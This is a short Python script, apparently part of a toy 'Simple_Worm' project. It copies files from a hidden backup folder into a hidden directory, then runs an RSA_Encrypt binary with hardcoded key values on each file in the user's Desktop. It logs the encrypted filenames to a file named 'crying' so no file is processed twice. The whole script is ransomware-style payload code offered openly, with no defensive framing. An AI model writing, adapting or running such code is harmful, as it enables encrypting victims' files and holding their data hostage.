#!/usr/bin/env python

import os,subprocess

def main():
    if not os.path.exists('/home/attacker/Public/.Simple_Worm/RSA_Encrypt'):
        subprocess.call(['mkdir','-p','/home/attacker/Public/.Simple_Worm/'])
        backups = os.listdir('/home/attacker/Desktop/.Backup/')
        for backup in backups:
            subprocess.call(['cp','/home/attacker/Desktop/.Backup/' + backup,'/home/attacker/Public/.Simple_Worm/'])
    files = os.listdir('/home/attacker/Desktop/')
    encrypted = []
    try:
        f = open("/home/attacker/Documents/crying",'r+')
        encrypted = [line.strip() for line in f.readlines()]
    except FileNotFoundError:
        f = open("/home/attacker/Documents/crying",'w')
    for file in files:
        if file not in encrypted:
            subprocess.call(['/home/attacker/Public/.Simple_Worm/RSA_Encrypt','-C','126419','30743','/home/attacker/Desktop/' + file])
            f.write(file + '\n')
    f.close()

if __name__ == '__main__':
    main()
